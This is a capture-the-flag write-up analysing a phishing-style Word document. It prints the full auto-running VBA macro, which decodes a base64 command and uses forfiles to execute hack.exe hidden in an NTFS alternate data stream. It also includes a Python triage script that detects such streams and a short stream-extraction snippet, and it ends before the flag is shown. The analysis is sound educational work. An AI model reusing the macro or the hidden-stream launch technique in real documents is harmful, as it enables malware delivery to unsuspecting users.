The office is a dangerous place. Last week Pam (the secretary) got an email, containing an archive. She ALMOST opened it, but then she remembered the IT security training from last month and fortunately decided to send the file to you. Something was phishy about the sender address to her. It was a close call to say the least…
- This challenge cannot be solved on any file systems other than NTFS.
- If you want to see the challenge in action, you have to use a Windows box with Office installed. In addition, add the folder where the challenge is extracted to Trusted Locations (help for that). The challenge can be solved without actually running anything.
- Windows Defender and other AVs might flag the files as dangerous, these are false positive alerts.
- Author: chronos
- Attachments: office_hazard.rar
I’ve read enough about CTFs and Word documents to know that we are looking at a VBA script challenge. Setting up a VM and opening the Word doc, a totally not sus command prompt is opened. I quickly extracted the VBA script using olevba. It’s a not so big script, so thankfully it isn’t VBA reversing.
Private Sub Document_Open()
    ' Auto-runs when the document is opened: decode the payload and hand it to cmd.exe
    Dim DecodedCode
    DecodedCode = DecodeBase64("Zm9yZmlsZXMgL1AgQzpcV2luZG93c1xTeXN0ZW0zMiAvbSBjYWxjLmV4ZSAvYyAlY2QlXHNlY3JldC50eHQ6aGFjay5leGU=")
    CreateObject("WScript.Shell").Exec ("cmd /c " & DecodedCode)
End Sub

Function DecodeBase64(b64$)
    ' Base64 -> bytes via an MSXML node, then bytes -> UTF-8 text via ADODB.Stream
    Dim b
    With CreateObject("Microsoft.XMLDOM").createElement("b64")
        .DataType = "bin.base64": .Text = b64
        b = .nodeTypedValue
        With CreateObject("ADODB.Stream")
            .Open: .Type = 1: .Write b: .Position = 0: .Type = 2: .Charset = "utf-8"
            DecodeBase64 = .ReadText
            .Close
        End With
    End With
End Function
The code above runs once, on opening the document. Decoding the base64 string, we can see that the following command is executed:
cmd /c forfiles /P C:\Windows\System32 /m calc.exe /c %cd%\secret.txt:hack.exe
This runs forfiles, a built-in Windows tool that executes the command given after /c once for every file under the /P directory that matches the /m mask. Since only calc.exe matches in C:\Windows\System32, the command after the second /c runs exactly once, and what it runs is %cd%\secret.txt:hack.exe, a path into the secret.txt file that ships with the challenge. And what is that syntax with the colon? Turns out the reason why NTFS was required is Alternate Data Streams: hack.exe is stored as a named stream inside secret.txt, which a normal directory listing does not show.
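As an added triage example (not part of the original writeup), this Python script does what the macro's DecodeBase64 does to the base64 literal above, parses the resulting forfiles command line into its /P, /m and /c switches, and flags any alternate-data-stream reference in the executed command. The base64 input is the one from the macro; the parsing and ADS-detection helpers are my own.

```python
import base64
import re

# The base64 literal from the macro's Document_Open, used here as sample input.
MACRO_B64 = ("Zm9yZmlsZXMgL1AgQzpcV2luZG93c1xTeXN0ZW0zMiAvbSBjYWxjLmV4ZSAvYyAl"
             "Y2QlXHNlY3JldC50eHQ6aGFjay5leGU=")

DRIVE_RE = re.compile(r"^[A-Za-z]:")


def decode_macro_payload(b64: str) -> str:
    """Base64 -> bytes -> UTF-8 text, exactly what the VBA DecodeBase64 does."""
    return base64.b64decode(b64).decode("utf-8")


def ads_reference(token: str):
    """Return (host_file, stream) if token names an NTFS alternate data stream.

    A colon directly after a drive letter (C:\\...) is not a stream separator,
    so it is stripped before looking for the host:stream colon.
    """
    body = DRIVE_RE.sub("", token)
    if ":" not in body:
        return None
    host, stream = body.rsplit(":", 1)
    if not host or not stream:
        return None
    return token[: len(token) - len(body)] + host, stream


def parse_forfiles(cmdline: str) -> dict:
    """Split a forfiles command line into path (/P), mask (/m) and command (/c).

    forfiles runs the /c command once per file under /P matching /m; the
    documented defaults are the current directory, '*' and 'cmd /c echo @file'.
    """
    tokens = cmdline.split()
    if tokens[:2] == ["cmd", "/c"]:          # the macro prepends "cmd /c "
        tokens = tokens[2:]
    if not tokens or tokens[0].lower() != "forfiles":
        raise ValueError("not a forfiles command line")
    info = {"path": ".", "mask": "*", "command": "cmd /c echo @file"}
    i = 1
    while i < len(tokens):
        sw = tokens[i].lower()
        if sw == "/c":                        # everything after /c is the command
            info["command"] = " ".join(tokens[i + 1:]).strip('"')
            break
        if sw in ("/p", "/m") and i + 1 < len(tokens):
            info["path" if sw == "/p" else "mask"] = tokens[i + 1]
            i += 2
            continue
        i += 1
    return info


def triage(b64: str) -> dict:
    """Decode the payload and flag ADS references in the command forfiles runs."""
    info = parse_forfiles(decode_macro_payload(b64))
    hits = [ads_reference(t) for t in info["command"].split()]
    info["ads_streams"] = [h for h in hits if h]
    info["suspicious"] = bool(info["ads_streams"])
    return info
```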
I wrote a quick few-liner in python to extract the data (I suck at ps, sorry):
with open('secret.txt:hack.exe', 'rb') as f:
    with open('hack.exe', 'wb') as f2:
        f2.write(f.read())
All that is left for us is to dig the flag out of the hack.exe binary. Loading the binary into Ghidra and doing a quick search for “flag” gets the job done: